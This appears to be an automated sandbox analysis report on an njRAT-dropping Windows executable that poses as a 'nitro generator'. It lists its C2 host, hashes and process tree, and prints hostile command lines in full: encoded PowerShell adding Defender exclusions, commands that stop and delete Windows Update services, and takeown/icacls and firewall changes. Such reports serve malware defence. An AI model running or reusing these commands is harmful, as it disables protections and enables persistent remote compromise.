Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20220718-en -
resource tags
arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system -
submitted
03-08-2022 04:42
Static task
static1
Behavioral task
behavioral1
Sample
pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
Resource
win10v2004-20220721-en
General
-
Target
pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe
-
Size
23.2MB
-
MD5
abb6afb4def4acfdd8cd790a9eef428d
-
SHA1
bd1fe3b2d4199e4ffbd90541b5604643ac471fc1
-
SHA256
46171b542b7193ba06131b31eb65ea14c02e7fda4c09572c628dc6c3caebdfa1
-
SHA512
cedff678884809a7057b81f0a81e23e5756f2c62dab3eb3e5504777a3ad900a76ef37076dfdd07fe6b781f9f4b472202a9748ea5ec88815fae77adaa370e2086
Malware Config
Extracted
njrat
0.7d
HacKed
pesho.firecho.cc:5552
95806694d02a9b98224f6826b0a19e35
-
reg_key
95806694d02a9b98224f6826b0a19e35
-
splitter
|'|'|
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Executes dropped EXE 6 IoCs
Processes:
Server.exetest.exenitro_generator.exenitro_generator.exeserver.exepid process 732 Server.exe 1560 test.exe 1524 nitro_generator.exe 948 nitro_generator.exe 1412 1936 server.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 1676 takeown.exe 1540 icacls.exe -
Stops running service(s) 3 TTPs
-
Drops startup file 2 IoCs
Processes:
server.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\95806694d02a9b98224f6826b0a19e35.exe server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\95806694d02a9b98224f6826b0a19e35.exe server.exe -
Loads dropped DLL 5 IoCs
Processes:
pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exenitro_generator.exenitro_generator.exepid process 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe 1524 nitro_generator.exe 948 nitro_generator.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 1676 takeown.exe 1540 icacls.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
server.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3762437355-3468409815-1164039494-1000\Software\Microsoft\Windows\CurrentVersion\Run\95806694d02a9b98224f6826b0a19e35 = "\"C:\\Windows\\server.exe\" .." server.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\95806694d02a9b98224f6826b0a19e35 = "\"C:\\Windows\\server.exe\" .." server.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
Server.exedescription ioc process File created C:\Windows\server.exe Server.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 1724 sc.exe 1108 sc.exe 1696 sc.exe 1820 sc.exe 520 sc.exe -
Detects Pyinstaller 6 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\nitro_generator.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe pyinstaller \Users\Admin\AppData\Local\Temp\nitro_generator.exe pyinstaller C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe pyinstaller \Users\Admin\AppData\Local\Temp\nitro_generator.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1228 reg.exe 1112 reg.exe 1356 reg.exe 1520 reg.exe 852 reg.exe 1860 reg.exe 672 reg.exe 468 reg.exe 1904 reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 900 powershell.exe 304 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
powershell.exepowershell.exeserver.exetakeown.exedescription pid process Token: SeDebugPrivilege 900 powershell.exe Token: SeDebugPrivilege 304 powershell.exe Token: SeDebugPrivilege 1936 server.exe Token: 33 1936 server.exe Token: SeIncBasePriorityPrivilege 1936 server.exe Token: SeTakeOwnershipPrivilege 1676 takeown.exe Token: 33 1936 server.exe Token: SeIncBasePriorityPrivilege 1936 server.exe Token: 33 1936 server.exe Token: SeIncBasePriorityPrivilege 1936 server.exe Token: 33 1936 server.exe Token: SeIncBasePriorityPrivilege 1936 server.exe Token: 33 1936 server.exe Token: SeIncBasePriorityPrivilege 1936 server.exe Token: 33 1936 server.exe Token: SeIncBasePriorityPrivilege 1936 server.exe Token: 33 1936 server.exe Token: SeIncBasePriorityPrivilege 1936 server.exe Token: 33 1936 server.exe Token: SeIncBasePriorityPrivilege 1936 server.exe Token: 33 1936 server.exe Token: SeIncBasePriorityPrivilege 1936 server.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exenitro_generator.exetest.exeServer.exeserver.execmd.exedescription pid process target process PID 1968 wrote to memory of 900 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe powershell.exe PID 1968 wrote to memory of 900 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe powershell.exe PID 1968 wrote to memory of 900 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe powershell.exe PID 1968 wrote to memory of 900 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe powershell.exe PID 1968 wrote to memory of 732 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe Server.exe PID 1968 wrote to memory of 732 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe Server.exe PID 1968 wrote to memory of 732 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe Server.exe PID 1968 wrote to memory of 732 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe Server.exe PID 1968 wrote to memory of 1560 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe test.exe PID 1968 wrote to memory of 1560 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe test.exe PID 1968 wrote to memory of 1560 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe test.exe PID 1968 wrote to memory of 1560 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe test.exe PID 1968 wrote to memory of 1524 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe nitro_generator.exe PID 1968 wrote to memory of 1524 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe nitro_generator.exe PID 1968 wrote to memory of 1524 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe nitro_generator.exe PID 1968 wrote to memory of 1524 1968 pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe nitro_generator.exe PID 1524 wrote to memory of 948 1524 nitro_generator.exe nitro_generator.exe PID 1524 wrote to memory of 948 1524 nitro_generator.exe nitro_generator.exe PID 1524 wrote to memory of 948 1524 nitro_generator.exe nitro_generator.exe PID 1560 wrote to memory of 304 1560 test.exe powershell.exe PID 1560 wrote to memory of 304 1560 test.exe powershell.exe PID 1560 wrote to memory of 304 1560 test.exe powershell.exe PID 732 wrote to memory of 1936 732 Server.exe server.exe PID 732 wrote to memory of 1936 732 Server.exe server.exe PID 732 wrote to memory of 1936 732 Server.exe server.exe PID 732 wrote to memory of 1936 732 Server.exe server.exe PID 1936 wrote to memory of 1948 1936 server.exe netsh.exe PID 1936 wrote to memory of 1948 1936 server.exe netsh.exe PID 1936 wrote to memory of 1948 1936 server.exe netsh.exe PID 1936 wrote to memory of 1948 1936 server.exe netsh.exe PID 1560 wrote to memory of 1736 1560 test.exe cmd.exe PID 1560 wrote to memory of 1736 1560 test.exe cmd.exe PID 1560 wrote to memory of 1736 1560 test.exe cmd.exe PID 1736 wrote to memory of 1724 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1724 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1724 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1108 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1108 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1108 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1696 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1696 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1696 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1820 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1820 1736 cmd.exe sc.exe PID 1736 wrote to memory of 1820 1736 cmd.exe sc.exe PID 1736 wrote to memory of 520 1736 cmd.exe sc.exe PID 1736 wrote to memory of 520 1736 cmd.exe sc.exe PID 1736 wrote to memory of 520 1736 cmd.exe sc.exe PID 1560 wrote to memory of 1484 1560 test.exe conhost.exe PID 1560 wrote to memory of 1484 1560 test.exe conhost.exe PID 1560 wrote to memory of 1484 1560 test.exe conhost.exe PID 1560 wrote to memory of 1484 1560 test.exe conhost.exe PID 1736 wrote to memory of 1228 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1228 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1228 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1112 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1112 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1112 1736 cmd.exe reg.exe PID 1736 wrote to memory of 852 1736 cmd.exe reg.exe PID 1736 wrote to memory of 852 1736 cmd.exe reg.exe PID 1736 wrote to memory of 852 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1860 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1860 1736 cmd.exe reg.exe PID 1736 wrote to memory of 1860 1736 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe"C:\Users\Admin\AppData\Local\Temp\pesho.firecho.cc_-_test2.exe___abb6afb4def4acfdd8cd790a9eef428d.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAaQB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAZgBxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaABsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AcQB3ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Server.exe"C:\Users\Admin\AppData\Local\Temp\Server.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\server.exe"C:\Windows\server.exe"3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\server.exe" "server.exe" ENABLE4⤵
- Modifies Windows Firewall
-
C:\Users\Admin\AppData\Local\Temp\test.exe"C:\Users\Admin\AppData\Local\Temp\test.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAdQBqACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBwAHYAZwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB3AGcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABvAG8AIwA+AA=="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe"C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe"C:\Users\Admin\AppData\Local\Temp\nitro_generator.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Server.exeFilesize
23KB
MD5b32f05d7c82cace7cc61f072042812d7
SHA1e952236a47e3e9beffc574e5afd47414dd7b7a13
SHA256681a82102f24abee65bd08305d86d49356a3762a3c4e00e1393a32a224ede1fe
SHA5129a436d37c351e28b2fdd91e314fa174dfb5739243a0291155f579803cea730f37143ae1622af5a1413fc0e754acdeae148df4f078e149d71cf6928d0d161de63
-
C:\Users\Admin\AppData\Local\Temp\Server.exeFilesize
23KB
MD5b32f05d7c82cace7cc61f072042812d7
SHA1e952236a47e3e9beffc574e5afd47414dd7b7a13
SHA256681a82102f24abee65bd08305d86d49356a3762a3c4e00e1393a32a224ede1fe
SHA5129a436d37c351e28b2fdd91e314fa174dfb5739243a0291155f579803cea730f37143ae1622af5a1413fc0e754acdeae148df4f078e149d71cf6928d0d161de63
-
C:\Users\Admin\AppData\Local\Temp\_MEI15242\python310.dllFilesize
4.2MB
MD5e9c0fbc99d19eeedad137557f4a0ab21
SHA18945e1811ceb4b26f21edcc7a36dcf2b1d34f0bf
SHA2565783c5c5a3ffce181691f19d27de376a03010d32e41360b72bcdbd28467cfcc5
SHA51274e1289683642ae2bc3cf780a07af1f27fed2011ef6cc67380f9c066c59d17a2fb2394a45a5c6cd75dad812a61093fdbd0f2108925f5c58fc6644c1c98be5c0b
-
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exeFilesize
18.9MB
MD586ab39312d5c33038d8035855a33dfe9
SHA12ae4360c5f3003c909a14dbe90eb58140be0de9e
SHA256d6201c3a44af55fa23b6e940f5099cfc46382aff734cf5c3d2b413324802bb16
SHA512e23f6b36937ff15648425431199a761a70691d6f895730a689a8c63235fcf69c6af2620825cf3f6f068de083812ae0001b4d240a0c26fc268d600b0c671b9d26
-
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exeFilesize
18.9MB
MD586ab39312d5c33038d8035855a33dfe9
SHA12ae4360c5f3003c909a14dbe90eb58140be0de9e
SHA256d6201c3a44af55fa23b6e940f5099cfc46382aff734cf5c3d2b413324802bb16
SHA512e23f6b36937ff15648425431199a761a70691d6f895730a689a8c63235fcf69c6af2620825cf3f6f068de083812ae0001b4d240a0c26fc268d600b0c671b9d26
-
C:\Users\Admin\AppData\Local\Temp\nitro_generator.exeFilesize
18.9MB
MD586ab39312d5c33038d8035855a33dfe9
SHA12ae4360c5f3003c909a14dbe90eb58140be0de9e
SHA256d6201c3a44af55fa23b6e940f5099cfc46382aff734cf5c3d2b413324802bb16
SHA512e23f6b36937ff15648425431199a761a70691d6f895730a689a8c63235fcf69c6af2620825cf3f6f068de083812ae0001b4d240a0c26fc268d600b0c671b9d26
-
C:\Users\Admin\AppData\Local\Temp\test.exeFilesize
4.4MB
MD534e11731bc8676b883ae52ad7598c1cb
SHA197f1896d5779fb8893f9669c4d1498acd91ebcc4
SHA25613d1b8e0eb7f74982debaaa2f713606aa4a8b1b35831dc90366f1e0a99f2fd03
SHA512a7c4ba673938c8a331e9d4ad7a9127f832a0c2eec7e5171e21800dca4b5bd8c45c3f47f2dfc544de11dae2e963bc259a0ee4b919333b1abf2532492209c5b319
-
C:\Users\Admin\AppData\Local\Temp\test.exeFilesize
4.4MB
MD534e11731bc8676b883ae52ad7598c1cb
SHA197f1896d5779fb8893f9669c4d1498acd91ebcc4
SHA25613d1b8e0eb7f74982debaaa2f713606aa4a8b1b35831dc90366f1e0a99f2fd03
SHA512a7c4ba673938c8a331e9d4ad7a9127f832a0c2eec7e5171e21800dca4b5bd8c45c3f47f2dfc544de11dae2e963bc259a0ee4b919333b1abf2532492209c5b319
-
C:\Windows\server.exeFilesize
23KB
MD5b32f05d7c82cace7cc61f072042812d7
SHA1e952236a47e3e9beffc574e5afd47414dd7b7a13
SHA256681a82102f24abee65bd08305d86d49356a3762a3c4e00e1393a32a224ede1fe
SHA5129a436d37c351e28b2fdd91e314fa174dfb5739243a0291155f579803cea730f37143ae1622af5a1413fc0e754acdeae148df4f078e149d71cf6928d0d161de63
-
C:\Windows\server.exeFilesize
23KB
MD5b32f05d7c82cace7cc61f072042812d7
SHA1e952236a47e3e9beffc574e5afd47414dd7b7a13
SHA256681a82102f24abee65bd08305d86d49356a3762a3c4e00e1393a32a224ede1fe
SHA5129a436d37c351e28b2fdd91e314fa174dfb5739243a0291155f579803cea730f37143ae1622af5a1413fc0e754acdeae148df4f078e149d71cf6928d0d161de63
-
\Users\Admin\AppData\Local\Temp\Server.exeFilesize
23KB
MD5b32f05d7c82cace7cc61f072042812d7
SHA1e952236a47e3e9beffc574e5afd47414dd7b7a13
SHA256681a82102f24abee65bd08305d86d49356a3762a3c4e00e1393a32a224ede1fe
SHA5129a436d37c351e28b2fdd91e314fa174dfb5739243a0291155f579803cea730f37143ae1622af5a1413fc0e754acdeae148df4f078e149d71cf6928d0d161de63
-
\Users\Admin\AppData\Local\Temp\_MEI15242\python310.dllFilesize
4.2MB
MD5e9c0fbc99d19eeedad137557f4a0ab21
SHA18945e1811ceb4b26f21edcc7a36dcf2b1d34f0bf
SHA2565783c5c5a3ffce181691f19d27de376a03010d32e41360b72bcdbd28467cfcc5
SHA51274e1289683642ae2bc3cf780a07af1f27fed2011ef6cc67380f9c066c59d17a2fb2394a45a5c6cd75dad812a61093fdbd0f2108925f5c58fc6644c1c98be5c0b
-
\Users\Admin\AppData\Local\Temp\nitro_generator.exeFilesize
18.9MB
MD586ab39312d5c33038d8035855a33dfe9
SHA12ae4360c5f3003c909a14dbe90eb58140be0de9e
SHA256d6201c3a44af55fa23b6e940f5099cfc46382aff734cf5c3d2b413324802bb16
SHA512e23f6b36937ff15648425431199a761a70691d6f895730a689a8c63235fcf69c6af2620825cf3f6f068de083812ae0001b4d240a0c26fc268d600b0c671b9d26
-
\Users\Admin\AppData\Local\Temp\nitro_generator.exeFilesize
18.9MB
MD586ab39312d5c33038d8035855a33dfe9
SHA12ae4360c5f3003c909a14dbe90eb58140be0de9e
SHA256d6201c3a44af55fa23b6e940f5099cfc46382aff734cf5c3d2b413324802bb16
SHA512e23f6b36937ff15648425431199a761a70691d6f895730a689a8c63235fcf69c6af2620825cf3f6f068de083812ae0001b4d240a0c26fc268d600b0c671b9d26
-
\Users\Admin\AppData\Local\Temp\nitro_generator.exeFilesize
18.9MB
MD586ab39312d5c33038d8035855a33dfe9
SHA12ae4360c5f3003c909a14dbe90eb58140be0de9e
SHA256d6201c3a44af55fa23b6e940f5099cfc46382aff734cf5c3d2b413324802bb16
SHA512e23f6b36937ff15648425431199a761a70691d6f895730a689a8c63235fcf69c6af2620825cf3f6f068de083812ae0001b4d240a0c26fc268d600b0c671b9d26
-
\Users\Admin\AppData\Local\Temp\test.exeFilesize
4.4MB
MD534e11731bc8676b883ae52ad7598c1cb
SHA197f1896d5779fb8893f9669c4d1498acd91ebcc4
SHA25613d1b8e0eb7f74982debaaa2f713606aa4a8b1b35831dc90366f1e0a99f2fd03
SHA512a7c4ba673938c8a331e9d4ad7a9127f832a0c2eec7e5171e21800dca4b5bd8c45c3f47f2dfc544de11dae2e963bc259a0ee4b919333b1abf2532492209c5b319
-
memory/268-123-0x0000000000000000-mapping.dmp
-
memory/304-92-0x00000000028A4000-0x00000000028A7000-memory.dmpFilesize
12KB
-
memory/304-84-0x000007FEED9A0000-0x000007FEEE3C3000-memory.dmpFilesize
10.1MB
-
memory/304-96-0x00000000028AB000-0x00000000028CA000-memory.dmpFilesize
124KB
-
memory/304-95-0x00000000028A4000-0x00000000028A7000-memory.dmpFilesize
12KB
-
memory/304-94-0x000000001B730000-0x000000001BA2F000-memory.dmpFilesize
3.0MB
-
memory/304-81-0x0000000000000000-mapping.dmp
-
memory/304-86-0x000007FEECE40000-0x000007FEED99D000-memory.dmpFilesize
11.4MB
-
memory/468-118-0x0000000000000000-mapping.dmp
-
memory/520-105-0x0000000000000000-mapping.dmp
-
memory/668-121-0x0000000000000000-mapping.dmp
-
memory/672-113-0x0000000000000000-mapping.dmp
-
memory/732-58-0x0000000000000000-mapping.dmp
-
memory/732-91-0x0000000073F90000-0x000000007453B000-memory.dmpFilesize
5.7MB
-
memory/732-78-0x0000000073F90000-0x000000007453B000-memory.dmpFilesize
5.7MB
-
memory/852-111-0x0000000000000000-mapping.dmp
-
memory/900-55-0x0000000000000000-mapping.dmp
-
memory/900-85-0x0000000073F90000-0x000000007453B000-memory.dmpFilesize
5.7MB
-
memory/900-79-0x0000000073F90000-0x000000007453B000-memory.dmpFilesize
5.7MB
-
memory/948-72-0x0000000000000000-mapping.dmp
-
memory/1108-101-0x0000000000000000-mapping.dmp
-
memory/1112-110-0x0000000000000000-mapping.dmp
-
memory/1204-125-0x0000000000000000-mapping.dmp
-
memory/1228-109-0x0000000000000000-mapping.dmp
-
memory/1356-117-0x0000000000000000-mapping.dmp
-
memory/1376-122-0x0000000000000000-mapping.dmp
-
memory/1484-106-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1484-107-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1520-120-0x0000000000000000-mapping.dmp
-
memory/1524-67-0x0000000000000000-mapping.dmp
-
memory/1524-69-0x000007FEFBD41000-0x000007FEFBD43000-memory.dmpFilesize
8KB
-
memory/1540-115-0x0000000000000000-mapping.dmp
-
memory/1560-103-0x0000000000720000-0x0000000000726000-memory.dmpFilesize
24KB
-
memory/1560-62-0x0000000000000000-mapping.dmp
-
memory/1560-75-0x000000013FFA0000-0x00000001403FE000-memory.dmpFilesize
4.4MB
-
memory/1588-126-0x0000000000000000-mapping.dmp
-
memory/1676-114-0x0000000000000000-mapping.dmp
-
memory/1696-102-0x0000000000000000-mapping.dmp
-
memory/1724-100-0x0000000000000000-mapping.dmp
-
